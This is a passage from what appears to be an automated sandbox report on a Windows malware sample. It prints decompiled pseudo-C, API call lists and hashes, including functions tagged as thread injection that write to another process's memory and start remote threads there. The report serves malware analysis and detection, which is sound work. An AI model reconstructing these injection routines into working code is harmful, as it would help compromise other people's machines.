						if(E001D2CC7(_t76 - 0xa8,  *((intOrPtr*)( *((intOrPtr*)(_t76 + 8)))) + 6, _t13,  *((intOrPtr*)(_t69 + 4))) <= 0) {
							L14:
							E001D15A3(_t76 - 0xa8);
							while( *((intOrPtr*)(_t76 - 0x1c)) != 0) {
								 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) - 1;
								 *(_t76 - 4) = 0;
								L001D32DA();
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
							}
							return E001D173E(PostMessageA( *0x1d50c0, 0x400, 1, 2));
						}
						if(PeekMessageA(_t76 - 0xc4, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
						goto L14;
					}
					_t63 = _t56 - 1;
					if(_t63 == 0) {
						continue;
					}
					if(_t63 != 1) {
						goto L14;
					}
					_t65 = _t76 - 0x254;
					_push(_t65);
					_push(0x101);
					L001D1454();
					if(_t65 != 0) {
						goto L14;
					}
					 *((intOrPtr*)(_t76 - 0x1c)) =  *((intOrPtr*)(_t76 - 0x1c)) + 1;
				}
				_t75 = LocalAlloc(0x40, 0x4464);
				if(_t75 != 0) {
					 *(_t75 + 0x6c) = 1;
					 *(_t75 + 0x70) =  *(_t75 + 0x70) | 0xffffffff;
					 *(_t75 + 0x5c) =  *(_t75 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t75 + 0x3ba8)) = GetCurrentThreadId();
					_t23 = _t75 + 0x3c58; // 0x3c58
					E001D3834(_t23, _t76 - 0xa8, 0x80);
					 *(_t75 + 0x6c) = 3;
					_t54 = CreateThread(0, 0, E001D3722, _t75, 0, _t76 - 0x28);
					_t26 = _t75 + 0x3ba4; // 0x3ba4
					_t71 = _t26;
					 *_t71 = _t54;
					if(_t54 != 0) {
						 *(_t76 - 0x24) = 1;
						 *((intOrPtr*)(_t76 - 0x74)) = 0;
						SetThreadPriority( *_t71, 0xfffffff1);
					}
				}
				E001D1ABC(_t75,  *(_t76 - 0x24));
				if( *(_t76 - 0x24) != 0) {
					goto L1;
				} else {
					goto L14;
				}
			}

APIs

WSAStartup.WSOCK32(00000101,?,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D269B

Part of subcall function 001D2CC7: LoadLibraryA.KERNEL32(wininet.dll), ref: 001D2CDB
Part of subcall function 001D2CC7: GetProcAddress.KERNEL32(001D12C8,001D12C8), ref: 001D2D07
Part of subcall function 001D2CC7: FreeLibrary.KERNEL32(?), ref: 001D2D3F
Part of subcall function 001D2CC7: inet_ntoa.WSOCK32(?), ref: 001D2D5E
Part of subcall function 001D2CC7: wsprintfA.USER32 ref: 001D2DBF

PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 001D26DE
LocalAlloc.KERNEL32(00000040,00004464,?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D26F4
GetCurrentThreadId.KERNEL32 ref: 001D270F
CreateThread.KERNEL32(00000000,00000000,001D3722,00000000,00000000,?), ref: 001D2743
SetThreadPriority.KERNEL32(00003BA4,000000F1), ref: 001D2763

Part of subcall function 001D1ABC: WaitForSingleObject.KERNEL32(?,00001388), ref: 001D1AED
Part of subcall function 001D1ABC: TerminateThread.KERNEL32(?,00000000), ref: 001D1B02
Part of subcall function 001D1ABC: CloseHandle.KERNEL32(?), ref: 001D1B0E
Part of subcall function 001D1ABC: LocalFree.KERNEL32(?,?), ref: 001D1B15

Part of subcall function 001D15A3: FreeLibrary.KERNEL32(00000000), ref: 001D15D1

WSACleanup.WSOCK32(?,?,?,?,?,00000000,00000080,001D13A0,00000244), ref: 001D2792
PostMessageA.USER32(00000400,00000001,00000002), ref: 001D27BB

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D19F3, Relevance: 12.1, APIs: 8, Instructions: 53 Total matches: 6
synchronization

Similarity

Total matches: 6
API ID: CloseHandle$SetEvent$DeleteCriticalSectionEnterCriticalSectionWaitForSingleObject
String ID:
API String ID: 4003875101-0
Opcode ID: 04216faaea4ba07e98bcd26563bf42db8e4c0576a096f68bb43e63f5af89c022
Instruction ID: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7
Opcode Fuzzy Hash: D9E08C43914E1AD0C8A7FDC0082E7061E61B76D1E2E5EC5053282436417F1EE0089F89
Instruction Fuzzy Hash: 111ecad9f7c2c59084eeb4c9e89245a319db93d705ee502b2a98683021befae7

C-Code - Quality: 100%

			E001D19F3(intOrPtr _a4) {
				signed char _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed char* _t24;
				void** _t27;
				intOrPtr _t29;
				void* _t30;
				struct _CRITICAL_SECTION* _t32;

				_t29 = _a4;
				_t24 = _t29 + 0x1b44;
				_t11 =  *_t24;
				if((_t11 & 0x00000001) != 0) {
					_t32 = _t29 + 0x1b18;
					 *_t24 = _t11 & 0x000000fe;
					EnterCriticalSection(_t32);
					_t13 =  *(_t29 + 0x1b40);
					if(_t13 != 0) {
						SetEvent(_t13);
					}
					_t14 =  *(_t29 + 0x1b10);
					if(_t14 != 0) {
						SetEvent(_t14);
					}
					_t27 = _t29 + 0x1b0c;
					_t15 =  *_t27;
					if(_t15 != 0) {
						WaitForSingleObject(_t15, 0x7d0);
						CloseHandle( *_t27);
						 *_t27 =  *_t27 & 0x00000000;
					}
					_t16 =  *(_t29 + 0x1b40);
					if(_t16 != 0) {
						_t16 = CloseHandle(_t16);
					}
					_t30 =  *(_t29 + 0x1b10);
					if(_t30 != 0) {
						_t16 = CloseHandle(_t30);
					}
					DeleteCriticalSection(_t32);
					return _t16;
				}
				return _t11;
			}

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
CloseHandle.KERNEL32(?), ref: 001D1A58
CloseHandle.KERNEL32(?), ref: 001D1A68
CloseHandle.KERNEL32(?), ref: 001D1A75
DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2C05, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 6
windowregistrytime

Similarity

Total matches: 6
API ID: CreateWindowExDispatchMessageGetMessageGetModuleFileNameRegisterClassSetTimerTranslateMessage
String ID:
API String ID: 1289143423-0
Opcode ID: a48adf90a0f1ca95f9f8ccd3f9eb1397de436c8d144647db204e4c52001b9e96
Instruction ID: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c
Opcode Fuzzy Hash: ABE0D843065850B3DC4B75752C0C31787917BC9ECAC9C67093056F4248CB87A61CEF43
Instruction Fuzzy Hash: 392c3d32be3034e4c8ac56a004de0633f00134dc32ddf829a8e1a5bcd824640c

C-Code - Quality: 81%

			E001D2C05(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x1d13f0);
				E001D1637(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x1d5044; // 0x1d0000
				 *0x001D50DC = _t11;
				_t30 = _t35 - 0x138;
				 *0x001D50F0 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x1d50cc);
				 *0x1d50c0 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0);
				_t15 =  *0x1d506c; // 0x0
				asm("sbb eax, eax");
				SetTimer( *0x1d50c0, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0);
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34);
				}
				 *0x1d50c0 = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E001D173E(0);
			}

APIs

GetModuleFileNameA.KERNEL32(001D0000,?,00000103,001D50CC,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,001D0000,00000000), ref: 001D2C49
RegisterClassA.USER32 ref: 001D2C4F
CreateWindowExA.USER32 ref: 001D2C55
SetTimer.USER32(00000064,-0000EA60,00000000), ref: 001D2C7D
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 001D2C8A
TranslateMessage.USER32(?), ref: 001D2C98
DispatchMessageA.USER32(?), ref: 001D2CA2

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D2997, Relevance: 9.1, APIs: 6, Instructions: 52 Total matches: 6
memorythreadinjection

Similarity

Total matches: 6
API ID: ExitThreadGetStdHandleLocalAllocLocalFreeReadProcessMemoryWriteProcessMemory
String ID:
API String ID: 3806972562-0
Opcode ID: d136b9818d58650d9e75ef7e59085fa17e81dc101a90658f0749166ad6ebe984
Instruction ID: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3
Opcode Fuzzy Hash: 17E04F44158F6AE1912A79441A0F72B9014BFD7BF9C0C0B37B138315C11B5E751A6B05
Instruction Fuzzy Hash: fbdfbd466d78e4125f2339b7d6edc0ae403b586f458be2afe4e561cdaceb8fd3

C-Code - Quality: 74%

			E001D2997() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				_push(0x10);
				_push(0x1d13c0);
				E001D1637(_t40, _t43, _t45);
				 *(_t47 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t44 = GetStdHandle(0xfffffff4);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				if( *(_t47 - 0x1c) != 0) {
					_push(_t47 - 0x20);
					_t41 = 4;
					_t46 =  *(_t47 + 8);
					if(WriteProcessMemory(_t44, _t46 + 0x84, _t47 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t44, _t46,  *(_t47 - 0x1c), 0x78, _t47 - 0x20) != 0) {
						 *( *(_t47 - 0x1c) + 0x6c) = _t41;
						 *( *(_t47 - 0x1c) + 0x70) =  *( *(_t47 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t47 - 0x1c) + 0x370c) =  *( *(_t47 - 0x1c) + 0x370c) | _t41;
						 *( *(_t47 - 0x1c) + 0x1bd4) = _t46;
						E001D27E6(_t41, _t42, _t44, _t46,  *( *(_t47 - 0x1c) + 0x370c),  *(_t47 - 0x1c));
					}
					LocalFree( *(_t47 - 0x1c));
				}
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				ExitThread(0);
			}

APIs

LocalAlloc.KERNEL32(00000040,00004464,001D13C0,00000010), ref: 001D29AA
GetStdHandle.KERNEL32(000000F4), ref: 001D29B5
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,?), ref: 001D29DE
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000078,?), ref: 001D29F3

Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F4,001D13D0,000000E4), ref: 001D2808
Part of subcall function 001D27E6: GetStdHandle.KERNEL32(000000F6), ref: 001D2880
Part of subcall function 001D27E6: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 001D28AC
Part of subcall function 001D27E6: ResumeThread.KERNEL32(?), ref: 001D291A
Part of subcall function 001D27E6: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D2929
Part of subcall function 001D27E6: CloseHandle.KERNEL32(?), ref: 001D2932

LocalFree.KERNEL32(00000000), ref: 001D2A27
ExitThread.KERNEL32 ref: 001D2A3C

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3
threadinjection

Similarity

Total matches: 3
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
String ID: !$@
API String ID: 3598368018-1106925043
Opcode ID: 94e025a43e91df62a48eb6b8a64d63848b0e0c680d25aaeca4969afcd1c9ee64
Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
Opcode Fuzzy Hash: CCD0A700DE1DC65871531046B5E47F3F1049F121CED5C379532992CB0C4B257038A241
Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c

C-Code - Quality: 33%

			E00403020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
CloseHandle.KERNEL32(?), ref: 00403087

Strings

!$@, xrefs: 00403020

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6
thread

Similarity

Total matches: 6
API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority
String ID:
API String ID: 1443725771-0
Opcode ID: cc963cedaaa8c141a90b6ba0a701b58c993f7297ed142496386f8b666d6d3d38
Instruction ID: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
Opcode Fuzzy Hash: B6E0DF84A25A4FC5C437E090203F77BA4207B0E9CADDC8521308F1AFA6BF08D406AB08
Instruction Fuzzy Hash: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1

C-Code - Quality: 100%

			E001D1E99(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t26;
				void* _t29;
				void* _t33;
				void* _t41;

				_t41 = _a8;
				_t21 =  *(_t41 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t41 + 0x1b44) = _t21 | 0x00000001;
					_t26 = _a4;
					 *((intOrPtr*)(_t41 + 0x1b48)) = _t26;
					 *((intOrPtr*)(_t41 + 0x1b14)) =  *((intOrPtr*)(_t26 + 0x70));
					InitializeCriticalSection(_t41 + 0x1b18);
					 *((intOrPtr*)(_t41 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t29 = CreateEventA(0, 1, 0, 0);
					 *(_t41 + 0x1b10) = _t29;
					if( *((intOrPtr*)(_t41 + 0x1b40)) == 0 || _t29 == 0) {
						L6:
						E001D19F3(_t41);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t41 + 0x1b0c), _a16);
						} else {
							_t33 = CreateThread(0, 0, _a12, _t41, 0,  &_a8);
							 *(_t41 + 0x1b0c) = _t33;
							if(_t33 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return 0;
			}

APIs

InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E

Part of subcall function 001D19F3: EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
Part of subcall function 001D19F3: WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A58
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A68
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A75
Part of subcall function 001D19F3: DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6
threadsynchronizationinjection

Similarity

Total matches: 6
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject
String ID:
API String ID: 1527658926-0
Opcode ID: 7410b3e9b634f2cff0a98ddadfc08129967f86c080f8268996739ca556ef27d6
Instruction ID: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
Opcode Fuzzy Hash: 6FC012804A5C0AB20527F0083D5D3060355AD112D146C7331715849542DF5CB269FF87
Instruction Fuzzy Hash: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083

C-Code - Quality: 100%

			E001D1BAA(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E001D1722(E001D2165), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

0x001d1baf
0x001d1bb6
0x001d1bdd
0x001d1be1
0x001d1be6
0x001d1bf1
0x001d1bf8
0x001d1bf8
0x001d1c03

APIs

GetStdHandle.KERNEL32(000000F4), ref: 001D1BB6
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 001D1BD7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001D1BE6
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 001D1BF1
CloseHandle.KERNEL32(00000000), ref: 001D1BF8

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6
synchronizationfile

Similarity

Total matches: 6
API ID: WaitForSingleObject$ReadFileResetEvent
String ID:
API String ID: 102907011-0
Opcode ID: 0299335ab9a3911fde22b8564450798ac63aade05c8ce35b27bba24940fd14d6
Instruction ID: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
Opcode Fuzzy Hash: F711368702CDCBF5C032FC00282A7AE5040ABCAAF5D5DD33662A525AC07F49E106B748
Instruction Fuzzy Hash: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29

C-Code - Quality: 84%

			E001D17D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				long _t77;
				void* _t85;
				intOrPtr _t87;
				long _t89;
				void* _t93;
				void* _t95;
				long _t97;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_push(0x24);
				_push(0x1d1430);
				E001D1637(__ebx, __edi, __esi);
				 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
				_t114 =  *((intOrPtr*)(_t115 + 8));
				_t112 =  *((intOrPtr*)(_t114 + 0x1b48)) + 0x1bc8;
				 *(_t115 - 0x24) =  *(_t114 + 0x1b14);
				if(( *(_t114 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t112 + 0x1b40), 0xffffffff);
				}
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				while(( *(_t112 + 0x1b44) & 0x00000001) != 0 && ( *(_t114 + 0x1b44) & 0x00000001) != 0) {
					 *(_t115 - 0x20) =  *(_t115 - 0x20) + 1;
					_t70 =  *(_t115 - 0x20);
					if(_t70 == 0) {
						 *(_t115 - 0x30) = 0xd80;
						continue;
					}
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						__eflags =  *(_t115 - 0x30) - 0xd80;
						if( *(_t115 - 0x30) > 0xd80) {
							 *(_t115 - 0x30) = 0xd80;
						}
						_t72 =  *((intOrPtr*)(_t114 + 0x1b48));
						__eflags =  *((intOrPtr*)(_t72 + 0x6c)) - 3;
						if(__eflags != 0) {
							ResetEvent( *(_t114 + 0x1b40));
							_t77 = ReadFile( *(_t115 - 0x24), _t114 + 0xd8c,  *(_t115 - 0x30), _t115 - 0x1c, _t114 + 0x1b30);
							__eflags = _t77;
							if(_t77 == 0) {
								_push( *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c));
								_push(0xa);
								E001D3644( *(_t115 - 0x24), _t115 - 0x1c, _t114 + 0x1b30);
							}
						} else {
							_push(_t115 - 0x1c);
							_push( *(_t115 - 0x30));
							_t107 = _t114 + 0xd8c;
							_push(_t114 + 0xd8c);
							_push(_t72);
							E001D1F4E(0xd80, _t112, _t114, __eflags);
						}
						__eflags =  *(_t115 - 0x1c);
						if(__eflags == 0) {
							__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c);
							if(__eflags != 0) {
								E001D1672( *(_t115 - 0x24));
							}
						}
						continue;
					}
					_t85 = _t71 - 1;
					if(_t85 == 0) {
						_t87 = 0xd80 -  *((intOrPtr*)(_t114 + 8));
						 *((intOrPtr*)(_t115 - 0x28)) = _t87;
						__eflags =  *(_t115 - 0x1c) - _t87;
						if( *(_t115 - 0x1c) > _t87) {
							_t107 =  *(_t115 - 0x1c) - _t87;
							__eflags =  *(_t115 - 0x1c) - _t87;
							E001D176E(_t112,  *(_t115 - 0x1c) - _t87, _t114, 0,  *(_t115 - 0x1c) - _t87);
						}
						_t89 = E001D20DA(0xd80, _t107, _t114, _t114 + 0xd8c,  *(_t115 - 0x1c));
						__eflags = _t89;
						if(_t89 == 0) {
							E001D1672( *(_t115 - 0x24));
						}
						__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c) - 3;
						if(__eflags != 0) {
							L22:
							 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
						}
						continue;
					}
					_t93 = _t85 - 1;
					if(_t93 == 0) {
						WaitForSingleObject( *(_t112 + 0x1b10), 0xffffffff);
						continue;
					}
					_t95 = _t93 - 1;
					if(_t95 == 0) {
						_t97 = E001D176E(_t112, __eflags, _t112, _t112 + 0xd8c, 0xd80);
						 *(_t115 - 0x1c) = _t97;
						__eflags = _t97;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t126 = _t95 != 1;
					if(_t95 != 1) {
						continue;
					}
					E001D2F13(_t112, 2);
					_push( *(_t115 - 0x1c));
					_push(_t112 + 0xd8c);
					_push( *((intOrPtr*)(_t112 + 0x1b48)));
					if(E001D2046(0xd80, _t114, _t126) == 0) {
						E001D1672( *(_t115 - 0x24));
					}
					E001D2F13(_t112, 1);
					goto L22;
				}
				 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
				__eflags = 0;
				return E001D173E(0);
			}

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D1809

Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C

Part of subcall function 001D2046: wsprintfA.USER32 ref: 001D2081

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D18AA

Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5

Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147

ResetEvent.KERNEL32(?), ref: 001D1935
ReadFile.KERNEL32(?,?,?,?,?), ref: 001D1953

Part of subcall function 001D3644: GetLastError.KERNEL32(?,?,001D197B,?,?,?,0000000A,00000003), ref: 001D3646
Part of subcall function 001D3644: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D3660
Part of subcall function 001D3644: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001D3671

Part of subcall function 001D1672: RaiseException.KERNEL32(00000003,00000000,00000001,?,001D1AB9,?,001D1A90,?,?,001D2102,?), ref: 001D167D

Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,?), ref: 001D2009

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6
threadsynchronizationwindow

Similarity

Total matches: 6
API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject
String ID:
API String ID: 2693620855-0
Opcode ID: 6e6f1deaef2e8bfaf0bbf284ef32ef05483bd122caecc3e4ef501d8e832f1d31
Instruction ID: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
Opcode Fuzzy Hash: BBF0A947480D4AF7D81B5931141CBBB7448B7CA3C18DCA65C30416752EAEDF325E9A5F
Instruction Fuzzy Hash: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68

C-Code - Quality: 97%

			E001D1466(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t11;
				void* _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t25;
				void* _t27;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t39;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;

				_t45 =  *0x1d5000; // 0x0
				if(_t45 == 0) {
					L5:
					__eflags =  *0x1d5078; // 0x0
					if(__eflags != 0) {
						L11:
						_t12 = 0;
						L14:
						L15:
						return _t12;
					}
					E001D37B7(_t11, 0x1d508c,  *0x1d5074);
					__eflags =  *0x1d50c4; // 0x1
					if(__eflags == 0) {
						_t20 = E001D37D0(0x28, 0,  &_v8);
						_t33 =  *0x1d5074; // 0x0
						asm("sbb ecx, ecx");
						__eflags =  ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2;
						if( ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2 != 0) {
							 *0x1d50bc = 0;
						}
					}
					__eflags =  *0x1d50bc; // 0x0
					if(__eflags != 0) {
						L13:
						 *0x1d5080 = 0x1d508c;
						_t12 = CreateThread(0, 0, E001D36F3, 0, 0, 0x1d5088);
						 *0x1d5000 = _t12;
						goto L14;
					} else {
						 *0x1d5084 =  *0x1d5084 + 1;
						_t14 =  *0x1d5084; // 0x0
						__eflags = _t14 - _a4;
						if(_t14 < _a4) {
							_t16 = E001D37D0(0x28, 0,  &_v8);
							_t32 =  *0x1d5074; // 0x0
							 *_t32 =  *((intOrPtr*)(_t16 + 2));
							E001D37B7( *((intOrPtr*)(_t16 + 2)), 0x1d508c,  *0x1d5074);
							 *0x1d50c4 = 1;
							 *0x1d50bc = 1;
							goto L13;
						}
						goto L11;
					}
				}
